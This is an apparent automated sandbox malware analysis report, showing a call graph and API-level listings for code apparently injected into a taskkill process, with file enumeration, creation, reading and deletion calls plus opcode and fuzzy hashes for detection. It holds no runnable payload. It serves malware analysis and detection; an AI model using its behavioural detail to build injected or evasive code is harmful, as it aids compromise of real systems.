97844 876da8 97843->97844 97864 87023c NtClose RtlFreeHeap LdrInitializeThunk 97843->97864 97844->97820 97846 876d8a 97846->97820 97848 86f42c 97847->97848 97849 864350 LdrLoadDll 97848->97849 97851 86f44a 97849->97851 97850 86f453 97850->97825 97851->97850 97852 864350 LdrLoadDll 97851->97852 97853 86f51e 97852->97853 97854 864350 LdrLoadDll 97853->97854 97855 86f57b 97853->97855 97854->97855 97855->97825 97858 86f365 97856->97858 97857 86f3fb CoUninitialize 97857->97836 97858->97857 97860 878b6a 97859->97860 97863 4be2c60 LdrInitializeThunk 97860->97863 97861 866269 97861->97818 97861->97842 97863->97861 97864->97846 97865 8659b0 97866 867ef0 LdrInitializeThunk 97865->97866 97867 8659e0 97866->97867 97869 865a0c 97867->97869 97870 867e70 97867->97870 97871 867eb4 97870->97871 97872 867ed5 97871->97872 97877 878500 97871->97877 97872->97867 97874 867ec5 97875 867ee1 97874->97875 97876 879210 NtClose 97874->97876 97875->97867 97876->97872 97878 87857d 97877->97878 97880 87852b 97877->97880 97882 4be4650 LdrInitializeThunk 97878->97882 97879 8785a2 97879->97874 97880->97874 97882->97879 97883 866f30 97884 866f4c 97883->97884 97887 866f9f 97883->97887 97886 879210 NtClose 97884->97886 97884->97887 97885 8670d7 97888 866f67 97886->97888 97887->97885 97894 866350 NtClose LdrInitializeThunk 97887->97894 97893 866350 NtClose LdrInitializeThunk 97888->97893 97890 8670b1 97890->97885 97895 866520 NtClose LdrInitializeThunk LdrInitializeThunk 97890->97895 97893->97887 97894->97890 97895->97885 97896 86ff30 97897 86ff53 97896->97897 97898 864350 LdrLoadDll 97897->97898 97899 86ff77 97898->97899 97900 876d10 3 API calls 97899->97900 97901 8700fe 97899->97901 97900->97901 97902 879170 97903 8791e7 97902->97903 97905 87919b 97902->97905 97904 8791fd NtDeleteFile 97903->97904 97906 868178 GetFileAttributesW 97907 868193 97906->97907

                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                      Function 0086C3E0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0086C4C4
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0086C4FF
                                                                                                                                                                                                                                      • FindClose.KERNELBASE(?), ref: 0086C50A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3541575487-0
                                                                                                                                                                                                                                      • Opcode ID: 1a4588cff350d22efd1582e4eac99176c3ada84599096f23ca51eba49280e49f
                                                                                                                                                                                                                                      • Instruction ID: f8323e671047d0862e5a1512e92b46e11e8e11d6cc524e1896dc131f3e76027f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a4588cff350d22efd1582e4eac99176c3ada84599096f23ca51eba49280e49f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07316371A00258BBDB60DB68CC85FFF77BCFF44744F144498B949E6181DA70AA848BA1
                                                                                                                                                                                                                                      Function 00878F10 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0087900E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 3fe039b03d3e8ba52d4e053b4d83f45fce84fc282e24ed526cc190fa88aecc1e
                                                                                                                                                                                                                                      • Instruction ID: 026b22160e7388a58e63da5d565a76e3d55ccd116e5de79beb00b7e672db2984
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fe039b03d3e8ba52d4e053b4d83f45fce84fc282e24ed526cc190fa88aecc1e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C31B5B5A00208AFCB14DF98D885EEEBBF9FF88304F108109F959A7344D770A851CBA5
                                                                                                                                                                                                                                      Function 00879080 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00879166
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: a1ebfaff676f34ec72b2be1eff50992f2b65536806e661c1ed21424d37369546
                                                                                                                                                                                                                                      • Instruction ID: c6c404a0ee70456a132f958a5ff46c1ab66c32156c704720940e7e8527e1d652
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1ebfaff676f34ec72b2be1eff50992f2b65536806e661c1ed21424d37369546
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D31E7B5A00249ABCB14DF98D885EEFB7B9EF88314F108219F919A7344D770A851CBA5
                                                                                                                                                                                                                                      Function 00879170 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DeleteFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4033686569-0
                                                                                                                                                                                                                                      • Opcode ID: 8aa1ffc4ea7dd53c13a2e595b786a956afe812bdd4d7f26d3ee0cdc4469b6fb1
                                                                                                                                                                                                                                      • Instruction ID: 5a1ae5258cab18adc239e7620a0b4bb05bc85f45d0216dffb9a8fceecd0e3682
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8aa1ffc4ea7dd53c13a2e595b786a956afe812bdd4d7f26d3ee0cdc4469b6fb1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43115E71A10208BAD610EB58DC46FEFB7ACEB85314F408109FA4DAB245D771B905CBA6
                                                                                                                                                                                                                                      Function 00879210 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00879244
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3897564995.0000000000850000.00000040.80000000.00040000.00000000.sdmp, Offset: 00850000, based on PE: false
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_850000_taskkill.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                                                                                                                      • Opcode ID: febe32e7eea80cbd433ec382fcb712a4c5645aad6e5cf033f31accf23b9c9390
                                                                                                                                                                                                                                      • Instruction ID: 175b1ddd2c96f2886d0ec0867ed358b951a3261f0171a52c95dbad378f23c44d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: febe32e7eea80cbd433ec382fcb712a4c5645aad6e5cf033f31accf23b9c9390
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19E086352003047BC610FA59DC45F9B775DDFC5754F408015FA08A7141CA71B901C7F5
                                                                                                                                                                                                                                      Function 04BE4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 8716070dce392685c16c1281e560963e47c849285e39fd61262d186f626a6df2
                                                                                                                                                                                                                                      • Instruction ID: 6532b0997a6a24d3f18501e60b8363f079dd25dbe5510591f4f422370e3c8c8c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8716070dce392685c16c1281e560963e47c849285e39fd61262d186f626a6df2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D890026260150042654071584C044066005DBE2305395C155A1595561C8718D96A9269
                                                                                                                                                                                                                                      Function 04BE4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: d5946daae606e982bbc142a4be14fd533a9365a399086db706c9981011665db5
                                                                                                                                                                                                                                      • Instruction ID: 94716ceec6348edfea0e516ca4304fcef12c421b57907a20bc23d9bed927a5f0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d5946daae606e982bbc142a4be14fd533a9365a399086db706c9981011665db5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F190023260580012B54071584C845464005DBE1305B55C051E1465555C8B14DA6B5361
                                                                                                                                                                                                                                      Function 04BE2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 99597994f4aaa39fddc112a4eb60735f30817b610fc539743316ca4eda053095
                                                                                                                                                                                                                                      • Instruction ID: d33a5a07e47feaf3d6e6c247a3ca93585ce28010b92ae51a8a3bb22fba6cfe79
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99597994f4aaa39fddc112a4eb60735f30817b610fc539743316ca4eda053095
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7990023220140402F500759858086460005CBE1305F55D051A6065556EC765D9A66131
                                                                                                                                                                                                                                      Function 04BE2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 35aa5fabdd72cbbdeca88952d7044904b5cce4aed087b5b6eea07d66fbfa0b88
                                                                                                                                                                                                                                      • Instruction ID: badf601c450191a523f55df7af997ed080ec96ef198f4796cd107f1301965b5c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 35aa5fabdd72cbbdeca88952d7044904b5cce4aed087b5b6eea07d66fbfa0b88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5090023220148802F5107158880474A0005CBD1305F59C451A5465659D8795D9A67121
                                                                                                                                                                                                                                      Function 04BE2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: a9a630b9a8b94484cb61c5029f6a04a65b8bfe03bcef6aac527d34aacd4333c2
                                                                                                                                                                                                                                      • Instruction ID: 017f298708a33aedb0a38611d14e90f14acad86febe1757b3e20406b28416f9f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a9a630b9a8b94484cb61c5029f6a04a65b8bfe03bcef6aac527d34aacd4333c2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F90023220140842F50071584804B460005CBE1305F55C056A1165655D8715D9667521
                                                                                                                                                                                                                                      Function 04BE2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: d1864ec73cbc18bb2e33f6489553622b2f15edbcb9745ac9bc8d2ff6b5e11169
                                                                                                                                                                                                                                      • Instruction ID: 74471d5b1d97f95eec91f485a1280bb7cdba6cac6d5b25f0d0aa9cfe2446816b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1864ec73cbc18bb2e33f6489553622b2f15edbcb9745ac9bc8d2ff6b5e11169
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D90023220140413F511715849047070009CBD1245F95C452A1465559D9756DA67A121
                                                                                                                                                                                                                                      Function 04BE2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 66dc53e065ad05fb5508f1b6b74a1b38bb33767b9fee678e456e8fa124861558
                                                                                                                                                                                                                                      • Instruction ID: 8f2b3852601b03d5f5eb0ef13adabd1f8d913325fb3d9a370ee0c4ef787662c4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66dc53e065ad05fb5508f1b6b74a1b38bb33767b9fee678e456e8fa124861558
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0900222242441527945B15848045074006DBE1245795C052A2455951C8726E96BD621
                                                                                                                                                                                                                                      Function 04BE2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: ad4a5a72f0089b44d47578bccb98b15c657bbc8ea7d3c1402bf503784469646f
                                                                                                                                                                                                                                      • Instruction ID: a0d1409ca0c78c26e638384e4be8cd251127d70327efade93553d22d3e204312
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ad4a5a72f0089b44d47578bccb98b15c657bbc8ea7d3c1402bf503784469646f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C990022230140003F540715858186064005DBE2305F55D051E1455555CDB15D96B5222
                                                                                                                                                                                                                                      Function 04BE2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 6c2aa838263ce1e14539daa788904f242c4de2107b29ebd8560d437fb27b8c33
                                                                                                                                                                                                                                      • Instruction ID: 50ca226d2b48148b8f6805642298a355455e6f35831236e7ed797b5a49814752
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c2aa838263ce1e14539daa788904f242c4de2107b29ebd8560d437fb27b8c33
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A90022A21340002F5807158580860A0005CBD2206F95D455A1056559CCB15D97E5321
                                                                                                                                                                                                                                      Function 04BE2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 6db378db695f73f4c0d9540ffb82c33c9e1791145264932ac39e1da9e6c125da
                                                                                                                                                                                                                                      • Instruction ID: cb49876837eef875a47ddf3aa3ea5e93931a320a59b16c7996ea9dc11f9b4eff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6db378db695f73f4c0d9540ffb82c33c9e1791145264932ac39e1da9e6c125da
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A290026220180403F54075584C046070005CBD1306F55C051A30A5556E8B29DD666135
                                                                                                                                                                                                                                      Function 04BE2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: 27f3bd50d5d48279800c508a565659eded271ab1830f2f7b89dc6e5e6c2ce9d3
                                                                                                                                                                                                                                      • Instruction ID: 096a3d0fd98b12fc8d9355637a1b2aa6559dd780b4f21bb927c3696bfbc86317
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27f3bd50d5d48279800c508a565659eded271ab1830f2f7b89dc6e5e6c2ce9d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B890022260140042654071688C449064005EFE2215755C161A19D9551D8759D97A5665
                                                                                                                                                                                                                                      Function 04BE2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.3899568873.0000000004B70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C99000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004C9D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.3899568873.0000000004D0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_4b70000_taskkill.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                                      • Opcode ID: bc1ce1c87a9e74d03403c9f653ca9c3c4c82fbf08c61c5f85021570f5c9725c4
                                                                                                                                                                                                                                      • Instruction ID: b3e301a5e9a2e669c7ebe2969ecebb5125fa67a13f06956389e936228e467c5d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc1ce1c87a9e74d03403c9f653ca9c3c4c82fbf08c61c5f85021570f5c9725c4
